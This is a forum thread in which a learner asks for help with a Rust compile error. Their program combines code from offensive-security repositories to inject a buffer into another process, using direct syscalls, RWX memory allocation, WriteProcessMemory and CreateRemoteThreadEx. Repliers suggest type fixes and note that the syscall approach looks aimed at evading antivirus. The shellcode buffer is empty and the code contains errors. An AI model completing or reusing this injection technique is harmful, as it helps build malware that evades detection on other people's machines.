Help with system programming, please!

help
1

Dear friends, welcome all! Experimenting with system programming, I ran into a problem. Unfortunately I do not have enough knowledge to solve it. Experts, please advise me how to solve it.

I found code https://github.com/trickster0/OffensiveRust/tree/master/Process_Injection_CreateRemoteThread and had an idea to combine it with https://github.com/memN0ps/mordor-rs

Here is my code, the callabration of these two:

use std::{os::windows::raw::HANDLE, ptr::null_mut};
extern crate kernel32;
use freshycalls_syswhispers::{self, syscall, syscall_resolve::get_process_id_by_name};
use ntapi::{
    ntapi_base::CLIENT_ID,
    winapi::{
        shared::ntdef::{NT_SUCCESS, OBJECT_ATTRIBUTES},
        um::winnt::{PROCESS_VM_READ, PROCESS_VM_WRITE},
    },
};
use std::ptr;
use winapi::um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS};

fn main() {
    let test: [u8; 361] = [];

    env_logger::init();

    let mut oa = OBJECT_ATTRIBUTES::default();

    let process_id = get_process_id_by_name("testingapp.exe");
    let mut process_handle = process_id as HANDLE;

    let mut ci = CLIENT_ID {
        UniqueProcess: process_handle,
        UniqueThread: null_mut(),
    };

    unsafe {
        let status = unsafe {
            syscall!(
                "NtOpenProcess",
                &mut process_handle,
                PROCESS_VM_WRITE | PROCESS_VM_READ,
                &mut oa,
                &mut ci
            )
        };

        let mut h = process_handle;

        let mut addr = unsafe {
            syscall!(
                "NtAllocateVitualMemory",
                h,
                ptr::null_mut(),
                test.len() as u64,
                MEM_COMMIT | MEM_RESERVE,
                PAGE_EXECUTE_READWRITE
            )
        };

        let mut n = 0;

        unsafe {
            syscall!(
                "WriteProcessMemory",
                h,
                addr,
                test.as_ptr() as _,
                test.len() as u64,
                &mut n
            )
        };

        let mut hThread = unsafe {
            syscall!(
                "CreateRemoteThreadEx",
                h,
                ptr::null_mut(),
                0,
                Some(std::mem::transmute(addr)),
                ptr::null_mut(),
                0,
                ptr::null_mut()
            )
        };

        log::debug!("status: {:#x}", status);

        if !NT_SUCCESS(status) {
            unsafe { syscall!("NtClose", h) };
            panic!("Failed to get a handle to the target process");
        }

        log::debug!("Process Handle: {:?}", h);
        unsafe { syscall!("NtClose", h) };
    }
}


  test.as_ptr() as _,
   |                 ^^^^^^^^^^^^^^^^^^ cannot infer type

I can't figure it out! Don't swear, I'm learning) Good luck everyone, thank you!

2

UP, help me

3

what happens if you remove the cast? So just test.as_ptr() without as _.

1 Like
4

Try to change it into

test.as_ptr() as *const c_void
5

I've not seen this syscall! macro before, but at a glance it seems to be calling native apis without any typing information, so you need to tell Rust what you're casting to, rather than letting it figure it out.

You would probably have a nicer (and safer) time migrating to the windows crate, which has much better coverage than the older winapi.

I'm no hacker, but nothing you're doing seems like it needs it, unless you're trying to avoid AV detection. (Which, if that works, means the AV belongs in the trash).

Check the calls you're making in windows - Rust removing any Nt prefix, for example OpenProcess in windows::Win32::System::Threading - Rust

6

This topic was automatically closed 90 days after the last reply. We invite you to open a new topic if you have further questions or comments.